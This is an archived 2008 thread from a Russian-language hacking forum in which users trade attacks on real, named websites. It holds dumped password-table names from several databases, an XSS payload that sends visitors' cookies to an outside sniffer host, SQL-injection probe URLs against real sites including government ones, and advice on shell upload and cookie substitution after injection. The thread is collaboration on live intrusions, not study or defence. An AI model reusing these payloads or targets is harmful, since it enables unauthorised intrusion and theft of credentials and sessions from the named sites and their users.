ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.10.2008, 00:57
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме:
110445
Репутация:
1
|
|
ok guys im sorry for bad russians
but i need help pls
course_enroll>course_enroll_pass>elearn
dept_member>PASS>elearn
members>PASS>elearn
users>Password>elearn
course_enroll>course_enroll_pass>fopme
dept_member>PASS>fopme
members>PASS>fopme
users>Password>fopme
mdl_course>password>mis
mdl_course_request>password>mis
mdl_hotpot>password>mis
mdl_lesson>usepassword>mis
mdl_lesson>password>mis
mdl_lesson_default>usepassword>mis
mdl_lesson_default>password>mis
mdl_quiz>password>mis
mdl_user>password>mis
mdl_workshop>usepassword>mis
mdl_workshop>password>mis
course_enroll>course_enroll_pass>pharmacy
dept_member>PASS>pharmacy
faculty_users>Pass>pharmacy
members>PASS>pharmacy
users>Password>pharmacy
members>PASS>qaumed
members>PASS>qaumed_evaluation
faculty>password>scuws
faculty_copy>password>scuws
members>PASS>scuws
users>Password>scuws
mdl_course>password>test
mdl_course_request>password>test
mdl_exercise>usepassword>test
mdl_exercise>password>test
mdl_groups>password>test
mdl_hotpot>password>test
mdl_lesson>usepassword>test
mdl_lesson>password>test
mdl_lesson_default>usepassword>test
mdl_lesson_default>password>test
mdl_quiz>password>test
mdl_user>password>test
mdl_workshop>usepassword>test
mdl_workshop>password>test
membersxx>PASS>test
members>PASS>test
i got this info but i need to get table to search
what to use????????????????????????
waitting>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
|
|
07.10.2008, 02:50
|
|
Новичок
Регистрация: 29.03.2006
Сообщений: 3
Провел на форуме:
70480
Репутация:
0
|
|
Как это можно использовать http://allsexcontact.ru:80/pages.php?id=<script>alert(39740,1099853472)</script>
|
|
|
|
07.10.2008, 05:23
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
google - > cookie & XSS
|
|
|
|
07.10.2008, 08:37
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
AHMED HASSAN
wtf? make sure u can write atleast some lang. that is understandable and try to explain exactly what u need! what table? u mean to search?
anyway if ur technological skillz are not enough developed to understand this, please read more of manual )
Nofear
http://allsexcontact.ru/pages.php?id=<script>img=new Image();img.src="http://sniffer.com/s.gif?"+document.cookie;</script>
например так
Велемир
metasploit?
а вот мои непохеки:
http://www.gbcma.vic.gov.au/default.asp?ID=177&post=132'&tpl=news_full
http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1%27
http://www.wildberries.ru/news/detail.aspx?ID=69%27
http://www.prazdnik.by/holidays/inter'
10к в сутки..)
Последний раз редактировалось sabe; 07.10.2008 в 08:50..
|
|
|
|
07.10.2008, 11:42
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
sabe
--------------------
Именно сдесь скули нет:
http://www.gbcma.vic.gov.au/default.asp?ID=177&post=132'&tpl=news_full
А вообще там с фильтрацией проблемы можно поискать другой параметр. База Access
--------------------
Это 3 ветка сравни
http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version( ),1,1)=3/*
и
http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version( ),1,1)=3/*
Видишь "About us" справа там где ошибка появлялась
Или вот сдесь более наглядно:
http://www.nfvcb.gov.ng/home_innerpages.php?pageid=39+and+substring(versio n(),1,1)=3&pagesectionid=7
----------------------
Это не скуль
http://www.wildberries.ru/news/detail.aspx?ID=69%27
----------------------
Последняя: Портал работает на "Битрикс" можешь при желании поискать баги под неё 
|
|
|
|
24.10.2008, 22:05
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
народ есть сайт со скулью
прочитал хеш админа но спустя пару поисков пароля к хешу я решился сделать след.
метод Update
чтение файла
загрузка шелла
все это бесполезно так вот если еще варианты кроме как расш. хеша???
|
|
|
|
24.10.2008, 22:12
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
например подмена кук)
мб после залогинивание в куках передаётся хеш пароля
а так хз что ещё
|
|
|
|
24.10.2008, 22:58
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
diznt
php inj,mysql,xss
|
|
|
|
24.10.2008, 22:59
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
sabe ну эт я знаю а я говорю о sql иньекции
|
|
|
|
24.10.2008, 23:21
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
реверс ip - посмотреть мож еще есть ресурсы на том же сервере ...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
